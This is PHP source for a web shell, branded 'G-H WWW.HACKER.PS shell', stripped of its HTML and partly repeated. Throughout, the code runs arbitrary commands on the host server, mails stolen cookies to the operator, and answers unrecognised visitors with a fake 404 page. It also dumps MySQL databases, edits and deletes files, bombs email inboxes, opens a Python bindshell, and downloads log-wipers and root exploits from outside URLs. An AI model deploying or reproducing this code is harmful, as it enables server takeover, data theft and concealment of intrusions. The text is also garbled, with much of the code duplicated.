1 || count(get_included_files()) > 1) list($me) = explode("&", $_SERVER['REQUEST_URI']); else $me = $PHP_SELF . "?"; @session_start(); @set_time_limit(5); switch($auth){ // Authentication switcher case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey) hide(); break; case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)) hide(); break; case 3: if(!$_SERVER['PHP_AUTH_USER']) userauth(); break; default: break; } function cleandir($d){ // Function to clean up the $dir and $curdir variables $d = realpath($d); $d = str_replace("\\", "\", $d); $d = str_replace("////", "//", $d); return($d); } function userauth(){ // Basic authentication function global $user, $pass; header("WWW-Authenticate: Basic realm='Secure Area'"); if(md5($_SERVER['PHP_AUTH_USER']) != $user || md5($_SERVER['PHP_AUTH_PW'] != $pass)) hide(); } function get_exec_function(){ // Command execution method finder $exec_functions = array("popen", "exec", "shell_exec", "system", "passthru"); $disabled_funcs = ini_get('disable_functions'); foreach($exec_functions as $f) if(strpos($disabled_funcs, $f) === false) return $f; } function execute_command($exec_function, $command){ // Command execution function switch($exec_function){ case "popen": $h = popen($command, "r"); while(!feof($h)) echo(fgets($h)); break; case "exec": exec($command, $result); foreach($result as $r) echo($r . "n"); break; case "shell_exec": echo(shell_exec($command)); break; case "system": system($command); break; case "passthru": passthru($command); break; } } if(!$act && !$cmd && !@$_GET['cookie'] && !@$_GET['f'] && !@$dir && !$gf && !$img && !@$_GET['ajxcmd']) main(); elseif(!$act && $cmd){ // Raw command execution style(); echo("Results:n
"); echo(""); } elseif(@$_GET['ajxcmd']){ // Command execution for AJAX shell if($_GET['ajxcmd'] == "home") $_SESSION['work_dir'] = getcwd(); elseif($exec_function = get_exec_function()){ if(strpos($_GET['ajxcmd'], 'cd') === 0){ $c = array_pop(explode(" ", $_GET['ajxcmd'])); if(@is_dir($_SESSION['work_dir'] . DIRECTORY_SEPARATOR . $c) && $c[0] != '\' && $c[0] != '//') $_SESSION['work_dir'] .= DIRECTORY_SEPARATOR . $c; elseif(@is_dir($c) && $c[0] != '.') $_SESSION['work_dir'] = $c; else echo("Invalid directoryn"); } else{ @chdir($_SESSION['work_dir']); execute_command($exec_function, $_GET['ajxcmd']); } } else die("All execution methods disabled."); } elseif(@$_GET['cookie']){@mail($email, "Cookie Data", @$_GET['cookie'], "From: $email"); hide();} // Cookie stealer function elseif($act == 'view' && @$_GET['f'] && $dir) view($_GET['f'], $dir); elseif($img) img($img); elseif($gf) grab($gf); elseif(@$dir) files($dir); else{ switch($act){ case 'phpinfo': phpinfo();break; case 'sql': sql();break; case 'files': files(@$dir);break; case 'email': email();break; case 'cmd': cmd();break; case 'upload': upload();break; case 'tools': tools();break; case 'sqllogin': sqllogin();break; case 'sql': sql();break; case 'lookup': lookup();break; case 'kill': kill();break; case 'phpexec': execphp();break; case 'bshell': bshell();break; default: main();break; } } function hide(){ // Hiding function global $self, $soft, $servip, $servport; header("HTTP/1.0 404 Not Found"); ?> 404 Not Found

Not Found

The requested URL was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


G-H WWW.HACKER.PS shell v.<?php echo($version . "-" . $servip); ?> 'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute', 'tools'=>'Tools','sqllogin'=>'SQL','upload'=>'Get Files','kill'=>'Kill Shell'); $capt = array_flip($act); echo("
n"); echo("Host: $servip
n"); echo("Server software: $soft
n"); echo("Uname: " . php_uname() . "
n"); echo("Shell Directory: " . getcwd() . "
n"); echo(" More Less

Links

" . $link . " ] "); ?>


:: G-H WWW.HACKER.PS shell v ::

Execute PHP Code"); echo(""); echo("n
n"); echo(""); echo("
"); if(@$_POST['phpexec']){ echo(""); } } function sqllogin(){ // MySQL login function global $me; if(@$_SESSION['isloggedin'] == "true") header("Location: " . $me . "&act=sql"); if(@$_POST['un'] && @$_POST['pw']) header("Location: " . $me . "&act=sql"); style(); ?>
User:

Password:

Host:

Port:

n"); die(sqllogin()); } else $_SESSION['isloggedin'] = "true"; } else die(sqllogin()); if (@$_GET['db']){ mysql_select_db($_GET['db'], $sqlcon); if(@$_GET['sqlquery']){ $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error()); $num = mysql_num_rows($dat); for($i=0;$i<$num;$i++) echo(mysql_result($dat, $i) . "
n"); } else if(@$_GET['table'] && !@$_GET['sqlf']){ echo("Insert Row

n"); echo(""); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $i = 0; $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); echo(""); for($i=0;$i" . $row[0] . ""); } echo("n"); } } $y++; } echo("
" . $fields[$i]); $i++; } $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); $y=0; for($x=1;$x<=$num_rows+1;$x++){ if(!@$_GET['p']) $_GET['p'] = 1; if(@$_GET['p']){ if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){ echo("
n"); for($z=1;$z<=ceil($num_rows / 30);$z++){ echo("" . $z . " | "); } } elseif(@$_GET['table'] && @$_GET['sqlf']){ switch($_GET['sqlf']){ case "dl": sqldownload();break; case "ins": sqlinsert();break; default: $_GET['sqlf'] = ""; } } else{ echo(""); $query = "SHOW TABLES FROM " . $_GET['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)) echo("n"); echo("
" . $row[0] . "[Download]
"); } } else{ $dbs=mysql_list_dbs($sqlcon); while($row = mysql_fetch_object($dbs)) echo("" . $row->Database . "
n"); } mysql_close($sqlcon); } function sqldownload(){ // Download sql file function $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']); mysql_select_db($_GET['db'], $sqlcon); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); $i++; } $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); for($x=1;$x<$num_rows;$x++){ $out .= "("; for($i=0;$inGo back"); } $query = "SHOW COLUMNS FROM " . @$_GET['table']; $result = mysql_query($query, $sqlcon) or die("MYSQL ERROR: " . mysql_error()); $i = 0; $fields = array(); echo("
"); echo(""); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); echo("
" . $fields[$i] . "
n"); $i++; } echo("
"); echo("
n"); echo("
"); } function nicesize($size){ if(!$size) return "0 B"; if ($size >= 1073741824) return(round($size / 1073741824) . " GB"); elseif ($size >= 1048576) return(round($size / 1048576) . " MB"); elseif ($size >= 1024) return(round($size / 1024) . " KB"); else return($size . " B"); } function files($dir){ // File manipulator function global $me, $self, $curdir; style(); if($dir=="") $dir = $curdir; $dirx = explode(DIRECTORY_SEPARATOR, $dir); $files = array(); $folders = array(); echo("
"); echo(""); echo(""); echo("
"); echo("

File list for "); for($i=0;$i$dirx[$i]" . DIRECTORY_SEPARATOR); } echo("

"); echo(""); echo(""); if ($handle = opendir($dir)) { while (false != ($link = readdir($handle))) { if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){ $file = array(); $color = @is_writable($dir . DIRECTORY_SEPARATOR . $link) ? "forestgreen" : (is_readable($dir . DIRECTORY_SEPARATOR . $link) ? "gold" : "red"); @$file['link'] = "$link"; @$file['icon'] = "folder"; $folder = " ". $file['link']; array_push($folders, $folder); } else{ $file = array(); $ext = strpos($link, ".") ? strtolower(end(explode(".", $link))) : ""; $file['size'] = nicesize(@filesize($dir . DIRECTORY_SEPARATOR . $link)); $color = @is_writable($dir . DIRECTORY_SEPARATOR . $link) ? "forestgreen" : (is_readable($dir . DIRECTORY_SEPARATOR . $link) ? "gold" : "red"); @$file['link'] = "$link"; switch($ext){ case 'exe': case 'com': case 'jar': case '': $file['icon']='binary'; break; case 'jpg': case 'gif': case 'png': case 'bmp': $file['icon']='image'; break; case 'zip': case 'tar': case 'rar': case 'gz': case 'cab': case 'bz2': case 'gzip': $file['icon']='compressed'; break; case 'txt': case 'doc': case 'pdf': case 'htm': case 'html': case 'rtf': $file['icon']='text'; break; case 'wav': case 'mp3': case 'mp4': case 'wma': $file['icon']='sound'; break; case 'js': case 'vbs': case 'c': case 'h': case 'sh': case 'pl': case 'py': case 'php': case 'h': $file['icon']='script'; break; default: $file['icon'] = 'unknown'; break; } $file = "n"; array_push($files, $file); } } foreach($folders as $folder) echo("n"); foreach($files as $file) echo($file); echo("
File NameFile Size
 ". $file['link'] . "" . $file['size'] . "
$folderDIR
"); closedir($handle); } } function email(){ // Email bomber function global $me; style(); ?>
Your address:

Their address:

Subject:

Text:

How many times:



"); echo("Go back"); die(); } elseif(@$_POST['fileact'] == "Delete"){ unlink($filename); echo("Deleted file.

"); echo("Go back"); die(); } if($dir != "nullz") $filename = $dir . DIRECTORY_SEPARATOR . $filename; // heh $file = @fopen($filename, 'r'); $content = @fread($file, @filesize($filename)); echo("
"); echo("
Output Directory


Remote Upload


Local File Upload

"1", "Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz", "Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c", "gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh", "--- Priv Escalation ---"=>"2", "h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit", "k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3", "raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor", "rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd", "--- Bindshells ---"=>"3", "THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl", "Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix", "--- Misc ---"=>"4", "MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz", "xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c"); $names = array_flip($tools); echo("
"); echo("Output Directory
"); echo("

"); echo(""); echo("
"); echo("
"); echo("
"); echo("Bindshell (requires writable directory)
n"); echo("List domains (requires writable directory)
n"); echo("E-mail bomber
n"); } function lookup(){ // Domain lookup function global $servinf; style(); $script = "import urllib, urllib2, sys, re req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]})) site = re.findall('.+) (.+)
', urllib2.urlopen(req).read()) for i in xrange(0,len(site)): print site[i]"; // My sexy python script $handle = fopen('lookup.py', 'w'); @fwrite($handle, $script); @fclose($handle); echo("

Domains

"); echo(""); @unlink('lookup.py'); } function bshell(){ // Python bindshell script style(); if(!@$_POST['bport']){ ?>
Port:
"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAA" . "gALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwq" . "d1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", "image"=>"R0lGODlhFAAWAOMAAP////8zM8z//8zMzJmZmWZmZmYAADMzMwCZzACZMwAzZgAAAAAAAAAAAAAAAAAAACH+TlRoaX" . "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" . "ZXIgMTk5NQAh+QQBAAACACwAAAAAFAAWAAAEkPDISae4WBzAu99Hdm1eSYYZWXYqOgJBLAcDoNrYNssGsBy/4GsX6y" . "2OyMWQ2OMQngSlBjZLWBM1AFSqkyU4A2tWywUMYt/wlTSIvgYGA/Zq3QwU7mmHvh4g8GUsfAUHCH95NwMHV4SGh4Ed" . "ihOOjy8rZpSVeiV+mYCWHncKo6Sfm5cliAdQrK1PQBlJsrNSEQA7", "unknown"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . "AAADaDi6vPEwDECrnSO+aTvPEQcIAmGaIrhR5XmKgMq1LkoMN7ECrjDWp52r0iPpJJ0KjUAq7SxLE+sI+9V8vycFiM" . "0iLb2O80s8JcfVJJTaGYrZYPNby5Ov6WolPD+XDJqAgSQ4EUCGQQEJADs=", "binary"=>"R0lGODlhFAAWAMIAAP///8z//8zMzJmZmTMzMwAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . "AAADaUi6vPEwEECrnSS+WQoQXSEAE6lxXgeopQmha+q1rhTfakHo/HaDnVFo6LMYKYPkoOADim4VJdOWkx2XvirUgq" . "VaVcbuxCn0hKe04znrIV/ROOvaG3+z63OYO6/uiwlKgYJJOxFDh4hTCQA7", "text"=>"R0lGODlhFAAWAOMAAP/////MM/8zM8z//5mZmZlmM2bM/zMzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH+TlRoaX" . "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" . "ZXIgMTk5NQAh+QQBAAADACwAAAAAFAAWAAAEb/DISee4eBzAu99Hdm1eSYbZWXEkgI5sEBg0+2HnTBsccvhAmGtXAy" . "COSITwUGg2PYQoQalhOZ/QKLVV6gKmQm8XXDUmzx0yV5ze9s7JdpgtL3ME5jhHTS/xO3hwdWt0f317WwdSi4xRPxlw" . "kUgXEQA7", "compressed"=>"R0lGODlhFAAWAOcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP" . "9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/" . "M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmc" . "wzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZ" . "zJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAG" . "b//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZm" . "M2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmT" . "PMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMA" . "zDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAA" . "Bm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAM+4AAN0AALsAAKoAAIgAAHcA" . "AFUAAEQAACIAABEAAADuAADdAAC7AACqAACIAAB3AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgAAiAAAdwAAVQAARA" . "AAIgAAEe7u7t3d3bu7u6qqqoiIiHd3d1VVVURERCIiIhEREQAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMg" . "ZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAAkACwAAAAAFA" . "AWAAAImQBJCCTBqmDBgQgTDmQFAABDVgojEmzI0KHEhBUrWrwoMGNDihwnAvjHiqRJjhX/qVz5D+VHAFZiWmmZ8BGH" . "ji9hxqTJ4ZFAmzc1vpxJgkPPn0Y5CP04M6lPEkCN5mxoJelRqFY5TM36NGrPqV67Op0KM6rYnkup/gMq1mdamC1tdn" . "36lijUpwjr0pSoFyUrmTJLhiTBkqXCgAA7", "sound"=>"R0lGODlhFAAWAMIAAP////8zM8z//8zMzJmZmWYAADMzMwAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAACACwAAAAAFAAW" . "AAADayi63P4wNsNCkOocYVWPB7FxFwmFwGh+DZpynndpNAHcW9cVQUj8tttrd+G5hMINT7A0BpE4ZnF6hCqn0iryKs" . "0SDN9v0tSc0Q4DQ1SHFRjeBrQ6FzNN5Co2JD4YfUp7GnYsexQLhBiJigsJADs=", "script"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . "AAADZTi6vPEwDECrnSO+aTvPEddVIrhVBJCSF8QRMIwOBE2fVLrmcYz3O4pgKCDgVMgR0SgZOYVM0dNS/AF7gGy1me" . "16v9vXNdYNf89es2os00bRcDW7DVDDwe87fjMg+v9DNxBzYw8JADs="); header("Content-type: image/gif"); echo(base64_decode($images[$img])); die(); } function kill(){ // Shell deleter function style(); echo("
"); echo("Type 'confirm' to kill the shell:
n"); echo(""); echo("
"); if(@$_POST['ver'] == "confirm"){ $self = basename($_SERVER['PHP_SELF']); if(unlink($self)) echo("Deleted"); else echo("Failed"); } } die(); ?> "> 1 || count(get_included_files()) > 1) list($me) = explode("&", $_SERVER['REQUEST_URI']); else $me = $PHP_SELF . "?"; @session_start(); @set_time_limit(5); switch($auth){ // Authentication switcher case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey) hide(); break; case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)) hide(); break; case 3: if(!$_SERVER['PHP_AUTH_USER']) userauth(); break; default: break; } function cleandir($d){ // Function to clean up the $dir and $curdir variables $d = realpath($d); $d = str_replace("\\", "\", $d); $d = str_replace("////", "//", $d); return($d); } function userauth(){ // Basic authentication function global $user, $pass; header("WWW-Authenticate: Basic realm='Secure Area'"); if(md5($_SERVER['PHP_AUTH_USER']) != $user || md5($_SERVER['PHP_AUTH_PW'] != $pass)) hide(); } function get_exec_function(){ // Command execution method finder $exec_functions = array("popen", "exec", "shell_exec", "system", "passthru"); $disabled_funcs = ini_get('disable_functions'); foreach($exec_functions as $f) if(strpos($disabled_funcs, $f) === false) return $f; } function execute_command($exec_function, $command){ // Command execution function switch($exec_function){ case "popen": $h = popen($command, "r"); while(!feof($h)) echo(fgets($h)); break; case "exec": exec($command, $result); foreach($result as $r) echo($r . "n"); break; case "shell_exec": echo(shell_exec($command)); break; case "system": system($command); break; case "passthru": passthru($command); break; } } if(!$act && !$cmd && !@$_GET['cookie'] && !@$_GET['f'] && !@$dir && !$gf && !$img && !@$_GET['ajxcmd']) main(); elseif(!$act && $cmd){ // Raw command execution style(); echo("Results:n
"); echo(""); } elseif(@$_GET['ajxcmd']){ // Command execution for AJAX shell if($_GET['ajxcmd'] == "home") $_SESSION['work_dir'] = getcwd(); elseif($exec_function = get_exec_function()){ if(strpos($_GET['ajxcmd'], 'cd') === 0){ $c = array_pop(explode(" ", $_GET['ajxcmd'])); if(@is_dir($_SESSION['work_dir'] . DIRECTORY_SEPARATOR . $c) && $c[0] != '\' && $c[0] != '//') $_SESSION['work_dir'] .= DIRECTORY_SEPARATOR . $c; elseif(@is_dir($c) && $c[0] != '.') $_SESSION['work_dir'] = $c; else echo("Invalid directoryn"); } else{ @chdir($_SESSION['work_dir']); execute_command($exec_function, $_GET['ajxcmd']); } } else die("All execution methods disabled."); } elseif(@$_GET['cookie']){@mail($email, "Cookie Data", @$_GET['cookie'], "From: $email"); hide();} // Cookie stealer function elseif($act == 'view' && @$_GET['f'] && $dir) view($_GET['f'], $dir); elseif($img) img($img); elseif($gf) grab($gf); elseif(@$dir) files($dir); else{ switch($act){ case 'phpinfo': phpinfo();break; case 'sql': sql();break; case 'files': files(@$dir);break; case 'email': email();break; case 'cmd': cmd();break; case 'upload': upload();break; case 'tools': tools();break; case 'sqllogin': sqllogin();break; case 'sql': sql();break; case 'lookup': lookup();break; case 'kill': kill();break; case 'phpexec': execphp();break; case 'bshell': bshell();break; default: main();break; } } function hide(){ // Hiding function global $self, $soft, $servip, $servport; header("HTTP/1.0 404 Not Found"); ?> 404 Not Found

Not Found

The requested URL was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


G-H WWW.HACKER.PS shell v.<?php echo($version . "-" . $servip); ?> 'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute', 'tools'=>'Tools','sqllogin'=>'SQL','upload'=>'Get Files','kill'=>'Kill Shell'); $capt = array_flip($act); echo("
n"); echo("Host: $servip
n"); echo("Server software: $soft
n"); echo("Uname: " . php_uname() . "
n"); echo("Shell Directory: " . getcwd() . "
n"); echo(" More Less

Links

" . $link . " ] "); ?>


:: G-H WWW.HACKER.PS shell v ::

Execute PHP Code"); echo(""); echo("n
n"); echo(""); echo("
"); if(@$_POST['phpexec']){ echo(""); } } function sqllogin(){ // MySQL login function global $me; if(@$_SESSION['isloggedin'] == "true") header("Location: " . $me . "&act=sql"); if(@$_POST['un'] && @$_POST['pw']) header("Location: " . $me . "&act=sql"); style(); ?>
User:

Password:

Host:

Port:

n"); die(sqllogin()); } else $_SESSION['isloggedin'] = "true"; } else die(sqllogin()); if (@$_GET['db']){ mysql_select_db($_GET['db'], $sqlcon); if(@$_GET['sqlquery']){ $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error()); $num = mysql_num_rows($dat); for($i=0;$i<$num;$i++) echo(mysql_result($dat, $i) . "
n"); } else if(@$_GET['table'] && !@$_GET['sqlf']){ echo("Insert Row

n"); echo(""); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $i = 0; $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); echo(""); for($i=0;$i" . $row[0] . ""); } echo("n"); } } $y++; } echo("
" . $fields[$i]); $i++; } $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); $y=0; for($x=1;$x<=$num_rows+1;$x++){ if(!@$_GET['p']) $_GET['p'] = 1; if(@$_GET['p']){ if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){ echo("
n"); for($z=1;$z<=ceil($num_rows / 30);$z++){ echo("" . $z . " | "); } } elseif(@$_GET['table'] && @$_GET['sqlf']){ switch($_GET['sqlf']){ case "dl": sqldownload();break; case "ins": sqlinsert();break; default: $_GET['sqlf'] = ""; } } else{ echo(""); $query = "SHOW TABLES FROM " . $_GET['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)) echo("n"); echo("
" . $row[0] . "[Download]
"); } } else{ $dbs=mysql_list_dbs($sqlcon); while($row = mysql_fetch_object($dbs)) echo("" . $row->Database . "
n"); } mysql_close($sqlcon); } function sqldownload(){ // Download sql file function $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']); mysql_select_db($_GET['db'], $sqlcon); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); $i++; } $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); for($x=1;$x<$num_rows;$x++){ $out .= "("; for($i=0;$inGo back"); } $query = "SHOW COLUMNS FROM " . @$_GET['table']; $result = mysql_query($query, $sqlcon) or die("MYSQL ERROR: " . mysql_error()); $i = 0; $fields = array(); echo("
"); echo(""); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); echo("
" . $fields[$i] . "
n"); $i++; } echo("
"); echo("
n"); echo("
"); } function nicesize($size){ if(!$size) return "0 B"; if ($size >= 1073741824) return(round($size / 1073741824) . " GB"); elseif ($size >= 1048576) return(round($size / 1048576) . " MB"); elseif ($size >= 1024) return(round($size / 1024) . " KB"); else return($size . " B"); } function files($dir){ // File manipulator function global $me, $self, $curdir; style(); if($dir=="") $dir = $curdir; $dirx = explode(DIRECTORY_SEPARATOR, $dir); $files = array(); $folders = array(); echo("
"); echo(""); echo(""); echo("
"); echo("

File list for "); for($i=0;$i$dirx[$i]" . DIRECTORY_SEPARATOR); } echo("

"); echo(""); echo(""); if ($handle = opendir($dir)) { while (false != ($link = readdir($handle))) { if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){ $file = array(); $color = @is_writable($dir . DIRECTORY_SEPARATOR . $link) ? "forestgreen" : (is_readable($dir . DIRECTORY_SEPARATOR . $link) ? "gold" : "red"); @$file['link'] = "$link"; @$file['icon'] = "folder"; $folder = " ". $file['link']; array_push($folders, $folder); } else{ $file = array(); $ext = strpos($link, ".") ? strtolower(end(explode(".", $link))) : ""; $file['size'] = nicesize(@filesize($dir . DIRECTORY_SEPARATOR . $link)); $color = @is_writable($dir . DIRECTORY_SEPARATOR . $link) ? "forestgreen" : (is_readable($dir . DIRECTORY_SEPARATOR . $link) ? "gold" : "red"); @$file['link'] = "$link"; switch($ext){ case 'exe': case 'com': case 'jar': case '': $file['icon']='binary'; break; case 'jpg': case 'gif': case 'png': case 'bmp': $file['icon']='image'; break; case 'zip': case 'tar': case 'rar': case 'gz': case 'cab': case 'bz2': case 'gzip': $file['icon']='compressed'; break; case 'txt': case 'doc': case 'pdf': case 'htm': case 'html': case 'rtf': $file['icon']='text'; break; case 'wav': case 'mp3': case 'mp4': case 'wma': $file['icon']='sound'; break; case 'js': case 'vbs': case 'c': case 'h': case 'sh': case 'pl': case 'py': case 'php': case 'h': $file['icon']='script'; break; default: $file['icon'] = 'unknown'; break; } $file = "n"; array_push($files, $file); } } foreach($folders as $folder) echo("n"); foreach($files as $file) echo($file); echo("
File NameFile Size
 ". $file['link'] . "" . $file['size'] . "
$folderDIR
"); closedir($handle); } } function email(){ // Email bomber function global $me; style(); ?>
Your address:

Their address:

Subject:

Text:

How many times:



"); echo("Go back"); die(); } elseif(@$_POST['fileact'] == "Delete"){ unlink($filename); echo("Deleted file.

"); echo("Go back"); die(); } if($dir != "nullz") $filename = $dir . DIRECTORY_SEPARATOR . $filename; // heh $file = @fopen($filename, 'r'); $content = @fread($file, @filesize($filename)); echo("
"); echo("
Output Directory


Remote Upload


Local File Upload

"1", "Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz", "Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c", "gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh", "--- Priv Escalation ---"=>"2", "h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit", "k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3", "raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor", "rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd", "--- Bindshells ---"=>"3", "THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl", "Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix", "--- Misc ---"=>"4", "MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz", "xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c"); $names = array_flip($tools); echo("
"); echo("Output Directory
"); echo("

"); echo(""); echo("
"); echo("
"); echo("
"); echo("Bindshell (requires writable directory)
n"); echo("List domains (requires writable directory)
n"); echo("E-mail bomber
n"); } function lookup(){ // Domain lookup function global $servinf; style(); $script = "import urllib, urllib2, sys, re req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]})) site = re.findall('.+) (.+)
', urllib2.urlopen(req).read()) for i in xrange(0,len(site)): print site[i]"; // My sexy python script $handle = fopen('lookup.py', 'w'); @fwrite($handle, $script); @fclose($handle); echo("

Domains

